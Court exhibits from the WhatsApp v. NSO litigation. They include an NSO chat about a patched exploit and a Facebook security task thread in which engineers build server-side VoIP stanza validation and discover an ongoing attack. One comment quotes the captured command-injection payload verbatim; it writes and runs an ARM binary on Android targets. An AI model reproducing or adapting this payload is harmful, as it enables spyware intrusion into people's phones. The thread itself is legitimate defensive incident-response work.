| 08:31:19 | | < 47015109-d5c7-4d8b-a7bb-777a2e4c3bcd.jpg > | 0 |
| 08:32:00 | | Congrats to ____ for leading a complex PiXcell POC in the city of Jerusalem.<br><br>Bravo guys 💪💪 | 0 |
| 08:33:59 | | Kings!!👑👑👑 | 0 |
| 08:35:48 | | I made my warrior face | 0 |
| 08:36:17 | | Horror face after locking the target | 0 |
| 08:37:07 | | Great job guys !<br><br>Waiting to hesr about it in the office | 0 |

HIGHLY CONFIDENTIAL – ATTORNEYS' EYES ONLY                    SHANER_WHATSAPP_00001489

| 09:56:36 | ███████ | Hi team, | 0 |
| | | I am sure most of you already heard about Eden | |
| | | Just making sure every one is alligned | |
| | | So bottom line, Eden has finished its duty with us as a patch was done on the server side with the application it works with | |
| | | I heard some sales managers taking it in a dramatic way, your job is to make sure they remeber that along the years NSO has proven time after time that one of its biggest value is   the ability to "survive" this harsh enviorment of the cat and mouse game | |
| | | At this point all demos will move to | |
| | | 1 click Android | |
| | | 0 click ios | |
| | | R&D are working hard on different directions, hopfully we will have good news soon but please rember that our technological status is still great as we (as a company) have the resources to find some thing new in a relatively short time | |
| 09:58:34 | ███████ | ██ r I would vote for you! | 0 |
| 09:59:16 | ███████ | ☺ | 0 |
| 10:00:10 | ███████ | 👍 | 0 |
| 11:58:02 | ███████ | Amazing job and well done you 2 Pixcell warriors 🐌 | 0 |

HIGHLY CONFIDENTIAL – ATTORNEYS' EYES ONLY            SHANER_WHATSAPP_00001490

**SER-113**                                                    PTX-0066.0002

UNITED STATES DISTRICT COURT

NORTHERN DISTRICT OF
CALIFORNIA

Case #:    4:19-cv-07123-PJH

Plntf Exhibit No.    PTX-0013

Date Admitted:

By:

Kelly Collins, Deputy Clerk

10/21/2020                                    T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

T34775320                                                                                              ⌐→ Edit Mode

## [Follow-up] Server to validate call stanzas as defined in the protocol

 🧑 Jesus Barcons Palau          **Mid**          Private

Follow up on S164677. Client vulnerabilities could have been prevented by enforcing that stanzas are compliant with the protocol.

ODS counters:  https://fburl.com/ods/bwwvvmyg

| Public Title | Enter public task title |
|---|---|

Subscribers   Aby John    Amol Godbole    ~~Andrey Labunets~~    ~~Brendon Tiszka~~    Carl Woog    Chris Bream    Chris Puntarelli    Chris Steipp    Claudiu Gheorghe    Cortney Padua    Dan Gurfinkel    Despina Papageorge    Dhaval Kapil    ~~Doc Domko~~    Drew Robinson    Edward George    ~~Ehren Kret~~    ~~Elizabeth Schweinsberg~~    Elly Bingaman    Hasan Eray Dogan    Henry Han    Ibrahim Mohamed    Jeremy Apple    Jessica Romero    Jessica Romero    Jesus Barcons Palau    ~~Jim O'Leary~~    Joaquin Moreno Garijo    John Altenmueller    Kathy Zhang    Lauren Won    Manpreet Singh    Mark Hammell    Maxime Boucher    ~~Michael Kearney~~    Michael Scott    Mikhail Vorontsov    Otto Ebeling    Patrick Jette    ~~Paul Otto~~    ~~Roger Shen~~    SEV Manager    Sundar Jeyaraman    Tiana Demas    Xi Deng    YuanYuan Wang        See less

Tags          Dashboards    SEV Task    security    whatsapp

Creator       Jesus Barcons Palau (October 4, 2018)

FBID          472814263202094 (Copy Draft ID)

Schedule      **Start** mm/dd/yyyy  9:00 AM    **Target** mm/dd/yyyy  5:00 PM

Attachments   all_failed_20190506_1440.txt.gz
              all_malicious_offer_stanzas_20190506.txt
              attacker.patch
              attacker_signaling_trace.log.zip
              logs2.zip
              relation_numbers.csv
              trace_log_35796282384.html
              trace_log_legit_stanzas_16507147714.html
              whatsapp_2019-05-03_1-C1.log

https://www.internalfb.com/intern/tasks/?t=34775320                                                                        1/22

Highly Confidential - Attorneys' Eyes Only



WA-NSO-00017583

PTX-0013.0001

10/21/2020                                    T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

whatsapp-2019-05-03.1.log
whatsapp-2019-05-07.1.log
whatsapp-consumer-debug.apk
whatsapp-consumer-debug.apk
whatsapp-consumer-debug_exploit_iOS_Android.apk

| | | |
|---|---|---|
| Diffs | D15332007 | [chatd_c2s] Also log to Scuba VoIP stanzas that are sent by emulators.  Closed |
| | D15321226 | [voip_validation] Promoting some stanza validation from ?IN_PROGRESS to ?CHECKED.  Closed |
| | D15306712 | Also log to Scuba UUID of call offer that fails validation.  Closed |
| | D15264931 | Logging IP of clients that fail VoIP stanza validation.  Closed |
| | D15256060 | [voip_validation] Promote video and group call offers from in progress to checked.  Closed |
| | D15248456 | [voip_validation] Add validation for relayelection and transport stanzas.  Closed |
| | D15215075 | [voip_validation] Add validation for direct group call offers.  Closed |
| | D15214489 | [voip_validation] Add validation for video stanza.  Closed |
| | D15214368 | [voip_validation] Add validation for group call offer stanzas.  Closed |
| | D15213279 | [voip_validation] Add optional device attribute in offer stanza.  Closed |
| | D15196579 | Dropping call stanzas that fail validation.  Closed |
| | D15144352 | Fixed a couple of failures on offer and accept for stanza validation.  Closed |
| | D15117910 | Stanza validation for 1:1 call accept.  Closed |
| | D15068446 | [voip_validation] Validation for 1:1 call offer stanzas.  Closed |
| | D14694551 | [chat/voip_validation] Cleaner spec definition.  Closed |
| | D14597360 | [chatd/voip_validation] Add validation for enc_rekey stanzas.  Closed |
| | D14433076 | [chatd/voip_validation] First draft to perform validation of call stanzas.  Closed |
| | D14423162 | [tests/mod_call] Added e2e test for relaylatency.  Closed |
| | See less | |
| Blocks | T44191245 | Master task for SEV S178165 |
| | T22485260 | Security Review Request - WhatsApp client VoIP stack |
| | T38964548 | [Master] [WA] Whatsapp Hardening project |
| Depends on | T44089969 | finish voip stanza validation |
| | T44069331 | Make sure we store data from scribe's edgeray_debug |

Plugin Suggestions

6 plugin(s) have data available for this task. Click to activate them!

- Automation Test Status
- Flipper for Oculus Bug Reports
- Product-Feature Hierarchy
- SEV Manager

https://www.internalfb.com/intern/tasks/?t=34775320                                                    2/22

Highly Confidential - Attorneys' Eyes Only                                                    WA-NSO-00017584

PTX-0013.0002

**SER-116**

10/21/2020                                        T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

- Oncall Predictions
- Gilbert (Log Viewer)

## Activity & Comments

**Jesus Barcons Palau** created this task.

October 4, 2018

created the task

changed the priority to   **None**

subscribed Manpreet Singh, Claudiu Gheorghe, Jesus Barcons Palau and Ehren Kret

changed the title to "Server to validate call stanzas as defined in the protocol"

changed the description · View

**Hide all changes...**

**Otto Ebeling** subscribed Otto Ebeling and Ibrahim Mohamed

October 5, 2018

**Ibrahim Mohamed** made several changes

October 5, 2018

changed the title from "Server to validate call stanzas as defined in the protocol" to "[Follow-up] Server to validate call stanzas as defined in the protocol"

marked this task as blocking T22485260: Security Review Request - WhatsApp client VoIP stack

**Hide all changes...**

 **Otto Ebeling**

This is now even more relevant given that an external researcher found out a new way to inject voip_settings. See #33535414 / t37576393

It'd be a lot cleaner/safer to have the server enforce proper schema for all messages (and make sure clients don't send server-only messages etc.), as adding ad-hoc checks in the code is a bit of a whack-a-mole game, and further protocol changes can introduce new risks.

Does the server always re-encode the whole protocol tree? The researcher was also considering an attack where she would try to find data would be interpreted as one tree by the server and as another by the client, but if the server re-encodes the whole tree into the binary format, this wouldn't work as a way to bypass server-side filtering.

December 4, 2018 · Like ·        1 · Reply

 **Otto Ebeling**

Claudiu Gheorghe could you help find who could work on this?

I think the process of doing this could also be useful in improving documentation as well as sharing knowledge between the client/server teams, as the protocol would need to be

https://www.internalfb.com/intern/tasks/?t=34775320                                                                                    3/22

Highly Confidential - Attorneys' Eyes Only                                                                          WA-NSO-00017585

PTX-0013.0003

I think the process of doing this could also be useful in improving documentation as well as sharing knowledge between the client/server teams, as the protocol would need to be specified more formally.

December 4, 2018 · Like ·       1 · Reply

**Otto Ebeling** changed the priority from    **None**    to    **Mid**

December 4, 2018

**Jesus Barcons Palau** subscribed Maxime Boucher

December 5, 2018

**Jesus Barcons Palau**

I will be the one driving this task.

Today I have brought awareness of the need for stanza validation during the weekly server tech talk, where I have explained the security issues and server side fixes -- thanks Otto Ebeling and Ibrahim Mohamed!  More teams within WhatsApp will likely engage with the PSAA team.

Maxime Boucher has explained me how they validate stanzas for Ads using a Thrift schema to generate Erlang records.  This would be a good fit for us.  Before starting, I would like for the entire server team to be onboard using the same way for validating client generated stanzas.  Maxime Boucher will give a talk mid January.  Meanwhile we can start experimenting with this approach.

December 5, 2018 · Like ·       2 · Reply

**Jesus Barcons Palau** made several changes

December 6, 2018

    claimed the task

    changed the progress to    **Planned**

    subscribed Sundar Jeyaraman

**Hide all changes...**

**Ibrahim Mohamed** marked this task as blocking T38964548: [Master] [WA] Whatsapp Hardening project

January 10, 2019

**Jesus Barcons Palau** made several changes

March 12, 2019

    added D14423162: [tests/mod_call] Added e2e test for relaylatency.

    added D14433076: [chatd/voip_validation] First draft to perform validation of call stanzas.

**Hide all changes...**

**Jesus Barcons Palau** changed the progress from    **Planned**    to    **In Progress**

March 22, 2019

https://www.internalfb.com/intern/tasks/?t=34775320                                                                                                    4/22

Highly Confidential - Attorneys' Eyes Only

WA-NSO-00017586

PTX-0013.0004

10/21/2020                                        T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

 **Jesus Barcons Palau** Currently chatd555.atn is validating relaylatency stanza.  No actions are taken, just bumping counters: https://fburl.com/ods/78jgr6mn

March 22, 2019 · Like · Reply

**Jesus Barcons Palau** subscribed Xi Deng
March 22, 2019

 **Xi Deng** Try group call rekey for the next? The count in rekey is also affected by the pj_uint8_t issue in .58

March 22, 2019 · Like ·        1 · Reply

**Jesus Barcons Palau** added D14597360: [chatd/voip_validation] Add validation for enc_rekey stanzas.
March 25, 2019

 **Jesus Barcons Palau** Xi Deng, canarying this diff in chatd555.atn, so far all good but we have very few samples:  https://fburl.com/ods/sumad728

March 25, 2019 · Like · Reply

 **Xi Deng** Thanks, if we don't see any errors after some time. We can try .58 in house to test. Actually, I only checked the code but not actually test it to confirm rekey will have issue.

March 25, 2019 · Like · Reply

 **Jesus Barcons Palau** We have very few samples, maybe it's just a matter of waiting :)

March 25, 2019 · Like ·        1 · Reply

**Jesus Barcons Palau** added D14694551: [chat/voip_validation] Cleaner spec definition.
March 29, 2019

 **Otto Ebeling** Had a quick look at the diffs, exciting updates in this task :)

April 2, 2019 · Like · Reply

 **Jesus Barcons Palau** I will add validation for another stanza today.

April 24, 2019 · Like ·        1 · Reply

 **Otto Ebeling** One thought we had when discussing this with Ibrahim was that the fact that the schema is in Erlang may make it harder to understand for folks not that familiar with Erlang, and some other schma/configuration format could be easier to understand. What are your thoughts on this?

April 24, 2019 · Like · Reply

https://www.internalfb.com/intern/tasks/?t=34775320                                                                              5/22

Highly Confidential - Attorneys' Eyes Only                                                                              WA-NSO-00017587

PTX-0013.0005

10/21/2020                                    T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

**Jesus Barcons Palau** added D15068446: [voip_validation] Validation for 1:1 call offer stanzas.

April 24, 2019



**Jesus Barcons Palau**

Thanks for bringing this up Otto Ebeling! I considered creating a DSL but decided to go for Erlang directly after realizing that it didn't look bad at all --I'm obviously biased, but it's quite compact and nice the way to express stanza requirements:

```
        #xl{name = '#relaylatency',
            attrs = #{
                '#call-id' => {?STRING, ?REQUIRED},
                '#call-creator' => {?WID, ?OPTIONAL},
                '#transaction-id' => {?INT_32, ?OPTIONAL}
            },
            els = [
                    {#xl{name = '#te',
                        attrs = #{
                            '#latency' => {?INT_32, ?REQUIRED},
                            '#priority' => {?UINT_8, ?OPTIONAL}
                        },
                        els = ?IP_ADDRESS
                    },
                    {?REPEAT, 1, 8}}
                ]
        }
```

We can create a DSL and a DSL parser to convert to Erlang terms later on and reuse the validation engine of `voip_validation`. Thanks! :)

April 24, 2019 · Like ·      1 · Reply



**Jesus Barcons Palau**

Canarying stanza validation in chatd555.atn, some validations failed:

https://phabricator.intern.facebook.com/P62862739

https://www.internalfb.com/intern/tasks/?t=34775320                                    6/22

Highly Confidential - Attorneys' Eyes Only                                    WA-NSO-00017588

PTX-0013.0006

10/21/2020                                        T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

I have noticed "resume" in the offer, I haven't seen this in the spec.

https://fburl.com/ods/kktmwkvf

April 24, 2019 · Like ·      1 · Reply

**Jesus Barcons Palau** subscribed YuanYuan Wang

April 25, 2019



**Jesus Barcons Palau**

Some more stanzas that fail validation:

https://phabricator.intern.facebook.com/P62869110
https://phabricator.intern.facebook.com/P62869468

YuanYuan Wang, I have noticed that:

- Some offers don't have elements 'enc' and 'enc_opt', is this expected?  I thought that the encryption material must be present in the call offer...

April 25, 2019 · Like · Reply

**Jesus Barcons Palau** made several changes

April 28, 2019

       added D15117910: Stanza validation for 1:1 call accept.
       changed the description · View

**Hide all changes...**



**Jesus Barcons Palau**

Some failed stanzas for accept and offer: https://phabricator.intern.facebook.com/P63226851

For accept what seems to be missing is:

   {'#peer-device',"web"}

For offer I have to take a closer look.  Will send diff shortly.

April 29, 2019 · Like · Reply



**Jesus Barcons Palau:** Alright, the issue with offer stanzas is that "doc" attribute name is not in the atom table. I will make sure the module loads first so atoms are present and

https://www.internalfb.com/intern/tasks/?t=34775320                                                                                     7/22

Highly Confidential - Attorneys' Eyes Only                                                         WA-NSO-00017589

PTX-0013.0007

10/21/2020                                T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

**Jesus Barcons Palau** Alright, the issue with offer stanzas is that "dec" attribute name is not in the atom table. I will make sure the module loads first so atoms are present and used by the c2s parser.

April 29, 2019 · Like ·    1 · Reply

**Jesus Barcons Palau** added D15144352: Fixed a couple of failures on offer and accept for stanza validation.

April 29, 2019



**Jesus Barcons Palau**

Seeing failures in relaylatency stanzas: https://phabricator.intern.facebook.com/P63530004

I have to investigate further, but it seems that some clients are not sending call-creator as a wid or wid-string.

(cc YuanYuan Wang)

May 2, 2019 · Like · Reply

**Jesus Barcons Palau** Surprisingly the two clients in the paste are from    REDACTED

May 2, 2019 · Like · Reply



**Xi Deng** for creator jid. maybe an issue on iPhone-2.18.80 ? the both peer numbers in log are both iPhone-2.18.80  Roger Shen Kathy Zhang do you recall we send creator with only number ? (I assume Jesus Barcons Palau is complaining about this)

May 2, 2019 · Like · Reply



**Jesus Barcons Palau**

Some more logs: https://phabricator.intern.facebook.com/P63532452

Another one from   REDACTED  -the other ones have call-creator as an empty string and completely messed up attributes.

May 2, 2019 · Like · Reply

**Xi Deng** Jesus Barcons Palau just fyi, I'm doing the cross platform xml signaling on client side, feel free to ping me on any stanza issues.

May 2, 2019 · Like · Reply

**Xi Deng** empty ones come from 2,18,327? maybe the fake client. What about only valid some recent clients, e.g. 2.19 only? for old clients, it may be fixed issues or may be hard to find the code to verify.

May 2, 2019 · Like · Reply

**Xi Deng** for non empty one in the latest paste, the creator is also on 2.18.80 (iphone)

https://www.internalfb.com/intern/tasks/?t=34775320                                                                                      8/22

Highly Confidential - Attorneys' Eyes Only                                                                                    WA-NSO-00017590

PTX-0013.0008

10/21/2020                                    T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

**Xi Deng** for non empty one in the latest paste, the creator is also on 2.18.80 (iphone)

May 2, 2019 · Like · Reply

**Kathy Zhang** Xi Deng The call creator jid in relay latency stanza( outgoing) is filled by the call creator jid in call ctx in voip stack like all the other stanzas.

May 2, 2019 · Like · Reply

**Roger Shen** Hey Xi Deng, I don't recall we send number only for call creator. Voip Stack gives app JID string and we put :t into the stanza.

May 2, 2019 · Like · Reply

**Roger Shen** Do we have report on newer client? Agree with Xi that we moved stanza handling a lot recently and investigating older client issues won't help much

May 2, 2019 · Like · Reply

**Jesus Barcons Palau** This is success vs failed stanzas: https://fburl.com/ods/zz9ue6mq

It's been going on for more than a month... Numbers are not increasing.  Rogue clients maybe?

May 2, 2019 · Like · Reply

**Xi Deng** does iphone 2.18.80 send creator jid in offer? we can try a call between 2.19.53 (android) and 2.18.80 (iphone) to see what's going on.

May 2, 2019 · Like · Reply

**Jesus Barcons Palau**
Found this call offer, worth taking a look:

https://phabricator.intern.facebook.com/P63566079

Looked at user account, this is the registered device:

device_name:      samsung-VMware_Virtual_Platform

(cc Otto Ebeling, Ibrahim Mohamed)

May 2, 2019 · Like · Reply · Edited

**Ibrahim Mohamed**
There is this string

https://www.internalfb.com/intern/tasks/?t=34775320                                              9/22

Highly Confidential - Attorneys' Eyes Only                                                                    WA-NSO-00017591

PTX-0013.0009

10/21/2020                    T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

```
"=com.whatsapp;t=/data/data/$w/files/t;e=echo;c=\"chmod 777\";g=grep;v=/system/bin/am;u=$(which id>/dev/null && $e
$((`id | $g -oE \"uid=[0-9]+\" | $g -oE \"[0-9]+\"` / 100000)) || $e 0);cp $v ${t}p;s=\"stopservice --user $u
$w/.voipcalling.VoiceFGService;\";$v $s || ${t}p $s;rm ${t}*;$e -en
\"\\x7fELF\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x20\\x00\\x02\\x00\\x28\\x00\\x20\\x00\\x20\\x00\\x20\\x00
\\x20\\x00\\x04\\x00\\x00\\x00\\x19q\\x00\\xe3\\x00\\x20\\xb0\\xe34\\x00\\x20\\x00\\x01\\x00\\x00\\x00\\x12\\xc0\\x8f\\x
e2\\x01\\xc0\\x8c\\xe2\\x1c\\xff\\x2f\\xe1iF0\\x00\\x00\\xdf\\x01D\\x12\\x1a\\xfa\\xd1pG\\x02\\x20\\x01\\x21\\x00\\xdf\\
x06\\x00\\x027\\x0f\\xf20\\x01\\x10\\x22\\x00\\xdf\\x04\\x270\\x00\\x081\\x00\\xdf\\x20\\xb4\\x04\\x22\\x03\\x27\\xff\\x
f7\\xe7\\xff\\x04\\xbc\\x15\\x00\\xad\\xeb\\x02\\x0d\\xff\\xf7\\xe1\\xff\\x04\\x27\\x01\\x26\\x2a\\x00\\xff\\xf7\\xdc\\x
ff\\x01\\x27\\x00\\xdf\\x02\\x00\\xff\\x01\\xb9\\xe1EhX0Xu${t}z\\x00\">$t;$c $t;$t>${t}z;$c ${t}z;${t}z 6845e1b9
00001f93 fb55352a 3345d6f0;rm ${t}*;)&%0%0%0%0%0
```

Not sure if that is testing or a real exploit!!

May 2, 2019 · Like ·      1 · Reply

👤 **Ibrahim Mohamed** searching for where `connecting_tone_desc` is used! seems to be a command injection bug if it is valid

May 2, 2019 · Like · Reply

👤 **Ibrahim Mohamed** Jesus Barcons Palau is this being sent to Android or iOS? from the the string seems targeting Android?

May 2, 2019 · Like · Reply

👤 **Jesus Barcons Palau** Android-2.19.115

May 2, 2019 · Like · Reply

👤 **Jesus Barcons Palau** I can pull logs from the target phone.

May 2, 2019 · Like ·      1 · Reply

👤 **Ibrahim Mohamed** Jesus Barcons Palau that will help in understanding what's going on. I am also trying to check the Android code for callsite of this field

May 2, 2019 · Like ·      1 · Reply

👤 **Jesus Barcons Palau** Do you recommend to try to pull logs from the caller?  I'm hesitant since it may reveal that we are looking at them... But I could trace all messages on server side if it's useful.

May 2, 2019 · Like ·      1 · Reply

👤 **Ibrahim Mohamed** Nope, let's keep the caller as is. I Do not think the caller has a proper WA client anyway.

https://www.internalfb.com/intern/tasks/?t=34775320                                                      10/22

Highly Confidential - Attorneys' Eyes Only                                               WA-NSO-00017592

PTX-0013.0010

10/21/2020    T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

May 2, 2019 · Like · Reply

 **Jesus Barcons Palau**
Another one looking the same: https://phabricator.intern.facebook.com/P63568381

Different caller and target. Target platform Android-2.19.115.

May 2, 2019 · Like · Reply · Edited

 **Jesus Barcons Palau** I have been able to pull logs from the second target, please find them attached in the task.

May 2, 2019 · Like · Reply

**Jesus Barcons Palau** made several changes
May 2, 2019
    added attachment     whatsapp-2019-05-03.1….
    subscribed Mikhail Vorontsov
**Hide all changes...**

 **Jesus Barcons Palau**
These are all the failed stanzas (using the new validation method) for the past hour: https://phabricator.intern.facebook.com/P63576490

I can send a change in next chatd deploy to drop failed stanzas.

May 2, 2019 · Like · Reply

**Henry Han** added attachment     whatsapp-consumer-debug….
May 2, 2019

 **YuanYuan Wang** Henry just uploaded a apk which has the attacker's patch, it will send the call offer with options.tone_description

May 2, 2019 · Like ·    1 · Reply

 **YuanYuan Wang** Please check if the attack is related to the print function we used for the voip settings, we print all the voip options we get from server when the call offer is received

May 2, 2019 · Like · Reply

 **YuanYuan Wang** Upload another APK which could make the receiver side print out the same log as the target device pasted here.

https://www.internalfb.com/intern/tasks/?t=34775320    11/22

Highly Confidential - Attorneys' Eyes Only    WA-NSO-00017593

PTX-0013.0011

10/21/2020                                    T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

May 2, 2019 · Like · Reply

**YuanYuan Wang** made several changes
May 2, 2019

    added attachment     whatsapp-consumer-debug....
    added attachment     attacker.patch

**Hide all changes...**

**YuanYuan Wang** adding the patch on Android code base to start the attack on caller side

May 2, 2019 · Like · Reply

**Claudiu Gheorghe** what's the effect when sending this?

May 2, 2019 · Like · Reply

**Jesus Barcons Palau** added D15196579: Dropping call stanzas that fail validation.
May 3, 2019

**Jesus Barcons Palau** I have a diff out for review to drop failed stanzas:  D15196579

May 3, 2019 · Like · Reply

**Xi Deng** added attachment     whatsapp-2019-05-03.1 (2)....
May 3, 2019

**Xi Deng**

Otto Ebeling the log with (2) has stack trace for the crash for this one (the same user as Jesus's log, but a little earlier)

   16:16:58  Android / Crash    2.19.115  samsung-SM-G960F    8.0.0    +973 3670 0200 [CS]    Bahrain   whatsapp-2019-05-03.1.log.gz [txt] 5.01 MB    native
Exception
Method

Location
State
libwhatsapp.so:SIGSEGV
build_stun_req(transport_p2p*, relay_cfg_ctx const*, unsigned char*, unsigned long, unsigned short, int)
wa_transport.cc:3250
Open

https://www.internalfb.com/intern/tasks/?t=34775320                                                                                           12/22

Highly Confidential - Attorneys' Eyes Only                                                                                    WA-NSO-00017594

PTX-0013.0012

10/21/2020                              T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

May 3, 2019 · Like · Reply

Jesus Barcons Palau added attachment          trace_log_35796282384.h…
May 4, 2019


**Jesus Barcons Palau**
Adding server trace logs for 35796282384, sending the malicious stanza.

May 4, 2019 · Like · Reply


**Jesus Barcons Palau** All invalid stanzas since May 4 at midnight, 75 with the malicious payload:  https://phabricator.intern.facebook.com/P63705283

May 4, 2019 · Like · Reply


**Jesus Barcons Palau**
Adding for reference a server trace for how legit call stanzas look like. They have been sent from my work phone to my personal phone. There is a voice call and then a video call. In both cases I don't pick up the call but instead I hang up from the caller device.

May 4, 2019 · Like · Reply

**Jesus Barcons Palau** made several changes
May 4, 2019

    added attachment        trace_log_legit_stanzas_16507147714 .…
    added D15213279: [voip_validation] Add optional device attribute in offer stanza.

**Hide all changes...**

**Andrey Labunets** made several changes
May 4, 2019

    subscribed Andrey Labunets and Elizabeth Schweinsberg
    added allowed viewer Subscribers

**Hide all changes...**

**Jesus Barcons Palau** made several changes
May 5, 2019

    added D15214368: [voip_validation] Add validation for group call offer stanzas.
    added D15214489: [voip_validation] Add validation for video stanza.

https://www.internalfb.com/intern/tasks/?t=34775320                                                          13/22

Highly Confidential - Attorneys' Eyes Only                                                          WA-NSO-00017595

PTX-0013.0013

10/21/2020                                                    T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

added D15215075: [voip_validation] Add validation for direct group call offers.

**Hide all changes...**

 **Jesus Barcons Palau** All failed stanza validations since today at midnight: https://phabricator.intern.facebook.com/P63727422

May 5, 2019 · Like · Reply

**Jesus Barcons Palau** added attachment    all_malicious_offer_stanzas_2019050…

May 6, 2019

 **Jesus Barcons Palau**

Adding all the malicious offer stanzas since we started logging them (in file all_malicious_offer_stanzas_20190506.txt).

Total number: 1568

Source:

```
erlpssh.sh 'priv_atn/whatsapp/chatd/{0..400}' 'less chatd/log/chatd.log* | grep -B 20 -A 8 "system\/bin\/am"' >>
/tmp/all_malicious_offer_stanzas_20190506.txt

erlpssh.sh 'priv_atn/whatsapp/chatd/{401..800}' 'less chatd/log/chatd.log* | grep -B 20 -A 8 "system\/bin\/am"' >>
/tmp/all_malicious_offer_stanzas_20190506.txt

erlpssh.sh 'priv_atn/whatsapp/chatd/{801..1200}' 'less chatd/log/chatd.log* | grep -B 20 -A 8 "system\/bin\/am"' >>
/tmp/all_malicious_offer_stanzas_20190506.txt


erlpssh.sh 'priv_frc/whatsapp/chatd/{0..400}' 'less chatd/log/chatd.log* | grep -B 20 -A 8 "system\/bin\/am"' >>
/tmp/all_malicious_offer_stanzas_20190506.txt

erlpssh.sh 'priv_frc/whatsapp/chatd/{401..800}' 'less chatd/log/chatd.log* | grep -B 20 -A 8 "system\/bin\/am"' >>
/tmp/all_malicious_offer_stanzas_20190506.txt

erlpssh.sh 'priv_frc/whatsapp/chatd/{801..1200}' 'less chatd/log/chatd.log* | grep -B 20 -A 8 "system\/bin\/am"' >>
/tmp/all_malicious_offer_stanzas_20190506.txt
```

May 6, 2019 · Like · Reply

**Jesus Barcons Palau** added attachment    relation_numbers.csv

May 6, 2019

 **Jesus Barcons Palau**

https://www.internalfb.com/intern/tasks/?t=34775320                                                    14/22

Highly Confidential - Attorneys' Eyes Only                                                    WA-NSO-00017596

PTX-0013.0014

10/21/2020                                    T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

Adding list of attacker to victim (excluding our test numbers used to repro the issue) --filerame `relation_numbers.csv`.

May 6, 2019 · Like · Reply

**Andrey Labunets** did an action of type: InternActivityTaskAddParentTasks.

May 6, 2019

**Andrey Labunets** marked this task as depending on T44020385: crashlog: find similar crashes from S178165 in the past

May 6, 2019

**Andrey Labunets** marked this task as depending on T44019656: log all the large RTCP packets in edgeray

May 6, 2019

 **Claudiu Gheorghe** Jesus - do you want to use this task for tracking the validation for the rest of the VOIP stanzas? As we discussed with Nitin, we want to have that done, to see if they are able to exploit other paths

May 6, 2019 · Like · Reply

**Jesus Barcons Palau** Claudiu Gheorghe, I was planning to continue using this task for it. I sent 3 diffs during the weekend that validate group call offers (v1 and v2) and video stanzas --currently on code review. Next stanza to validate is transport, then I will get the rest.

May 6, 2019 · Like ·       1 · Reply

**Jesus Barcons Palau**

To clarify, recent files 'all_malicious_offer_stanzas_20199596.txt' and 'relation_numbers.csv' contain stanzas and phone numbers for the payload with substring **system/bin/am**.

YuanYuan Wang pointed out that there are other bad stanzas, they contain the substring **delay_based_bwe_trendline_filter_enabled**. Should we get to them later or start tracking them as well?

May 6, 2019 · Like · Reply

**YuanYuan Wang** added attachment      attacker_signaling_trace.log....

May 6, 2019

**YuanYuan Wang**

May 6, 2019 · Like ·       1 · Reply

**Jesus Barcons Palau** added attachment      all_failed_20190506_1440.tx...

May 6, 2019

https://www.internalfb.com/intern/tasks/?t=34775320                                                                    15/22

Highly Confidential - Attorneys' Eyes Only                                                    WA-NSO-00017597

PTX-0013.0015

10/21/2020                          T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks



**Jesus Barcons Palau**

Attaching *all* the failed stanzas seen by chatd so far.  Commands used to fetch them:

```
erlpssh.sh 'priv_atn/whatsapp/chatd/{0..400}' 'less chatd/log/chatd.log* | grep -A 40 "Failed VoIP stanza validation"'
>> /tmp/all_failed_20190506_1414.txt
```

```
erlpssh.sh 'priv_atn/whatsapp/chatd/{401..800}' 'less chatd/log/chatd.log* | grep -A 40 "Failed VoIP stanza
validation"' >> /tmp/all_failed_20190506_1414.txt
```

```
erlpssh.sh 'priv_atn/whatsapp/chatd/{801..1200}' 'less chatd/log/chatd.log* | grep -A 40 "Failed VoIP stanza
validation"' >> /tmp/all_failed_20190506_1414.txt
```

```
erlpssh.sh 'priv_frc/whatsapp/chatd/{0..400}' 'less chatd/log/chatd.log* | grep -A 40 "Failed VoIP stanza validation"'
>> /tmp/all_failed_20190506_1414.txt
```

```
erlpssh.sh 'priv_frc/whatsapp/chatd/{401..800}' 'less chatd/log/chatd.log* | grep -A 40 "Failed VoIP stanza
validation"' >> /tmp/all_failed_20190506_1414.txt
```

```
erlpssh.sh 'priv_frc/whatsapp/chatd/{801..1200}' 'less chatd/log/chatd.log* | grep -A 40 "Failed VoIP stanza
validation"' >> /tmp/all_failed_20190506_1414.txt
```

May 6, 2019 · Like · Reply



**Ibrahim Mohamed** Just confirmed that the same potential bug works on WhatsApp iOS. Tested on App store version 2.19.42
The patched (attacker's WA) is attached

May 6, 2019 · Like ·      3 · Reply

**YuanYuan Wang** marked this task as depending on T44019169: log all the packets from particular JIDs for investigation

May 6, 2019

**Ibrahim Mohamed** added attachment        whatsapp-consumer-debug_exploit_iOS_Androi…

May 6, 2019

**Claudiu Gheorghe** added tags  whatsapp , Dashboards , security

May 7, 2019



**Claudiu Gheorghe**

(posting for tomorrow, no need to reply now)

https://www.internalfb.com/intern/tasks/?t=34775320                                                              16/22

Highly Confidential - Attorneys' Eyes Only                                                                   WA-NSO-00017598

PTX-0013.0016

10/21/2020                                    T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

Jesus - we should start pushing out the Erlang changes and gate them behind a server knob (WGC, waknob, etc.), so that when we're ready we can enable the validation code in realtime.
- let's flesh out what how many of these stanzas are validated and how many are left; we can get more folks to help with that to parallelize the effort

May 7, 2019 · Like · Reply · Edited

 **Jesus Barcons Palau**  Sounds good, I will make changes to that diff so we can gate it behind a WGC variable.  Thanks!

May 7, 2019 · Like ·      1 · Reply

**Andrey Labunets** marked this task as depending on T44069331: Make sure we store data from scribe's edgeray_debug
May 7, 2019

Hasan Eray Dogan, Dan Gurfinkel, Mark Hammell and 21 more people were subscribed
May 7, 2019
**Load more changes**
    **Andrey Labunets** subscribed Brendon Tiszka
